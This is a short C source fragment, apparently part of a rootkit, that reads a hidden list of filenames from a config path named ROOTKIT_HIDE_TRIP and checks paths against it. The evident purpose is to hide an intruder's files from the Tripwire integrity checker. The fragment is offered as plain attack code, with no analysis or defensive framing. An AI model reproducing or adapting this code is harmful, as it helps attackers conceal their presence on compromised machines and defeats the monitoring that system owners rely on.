#define STR_SIZE	128

struct h_st {
	struct h_st *next;
	char filename[STR_SIZE];
};

struct h_st *hack_list;
struct h_st *h_tmp;

char tmp_str[STR_SIZE];

FILE *fp_hack;
 
inline file_block_list()
{
	char TWCONF[10];

	TWCONF[0]=ROOTKIT_HIDE_TRIP[0];
	TWCONF[1]=ROOTKIT_HIDE_TRIP[1];
	TWCONF[2]=ROOTKIT_HIDE_TRIP[2];
	TWCONF[3]=ROOTKIT_HIDE_TRIP[3];
	TWCONF[4]=ROOTKIT_HIDE_TRIP[4];
	TWCONF[5]=ROOTKIT_HIDE_TRIP[5];
	TWCONF[6]=ROOTKIT_HIDE_TRIP[6];
	TWCONF[7]=ROOTKIT_HIDE_TRIP[7];
	TWCONF[8]=ROOTKIT_HIDE_TRIP[8];
	TWCONF[9]='\0';

	h_tmp=(struct h_st *)malloc(sizeof(struct h_st));
	hack_list=h_tmp;

	if(fp_hack=fopen(TWCONF, "r")) {
		while(fgets(tmp_str, 126, fp_hack)) {
			h_tmp->next=(struct h_st *)malloc(sizeof(struct h_st));
			strcpy(h_tmp->filename, tmp_str);
			h_tmp->filename[strlen(h_tmp->filename)-1]='\0';
			h_tmp=h_tmp->next;
		}
	}

	h_tmp->next=NULL;
}

inline int check_file(char *fpath)
{ 

	for(h_tmp=hack_list; h_tmp->next; h_tmp=h_tmp->next)
		if(!strcmp(fpath, h_tmp->filename))
			return(1);

	return(0);
}   

